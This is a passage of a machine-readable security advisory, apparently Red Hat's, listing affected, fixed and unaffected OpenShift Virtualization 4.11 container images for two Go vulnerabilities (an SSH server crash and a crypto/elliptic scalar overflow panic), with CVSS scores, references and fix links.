[ { category: "description", text: "A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: crash in a golang.org/x/crypto/ssh server", title: "Vulnerability summary", }, { category: "other", text: "In OpenShift Container Platform (OCP) the vulnerable golang.org/x/crypto/ssh package is bundled in many components. The affected code is in the SSH server portion that is not used, hence the impact by this vulnerability is reduced. Additionally the OCP installer components, that also bundle vulnerable golang.org/x/crypto/ssh package, are used only during the cluster installation process, hence for already deployed and running OCP clusters the installer components are considered as affected by this vulnerability but not impacted.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-27191", }, { category: "external", summary: "RHBZ#2064702", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064702", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-27191", url: "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", url: "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, ], release_date: "2022-03-15T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crash in a golang.org/x/crypto/ssh server", }, { cve: "CVE-2022-28327", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-04-21T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2077689", }, ], notes: [ { category: "description", text: "An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: panic caused by oversized scalar", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang & go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", 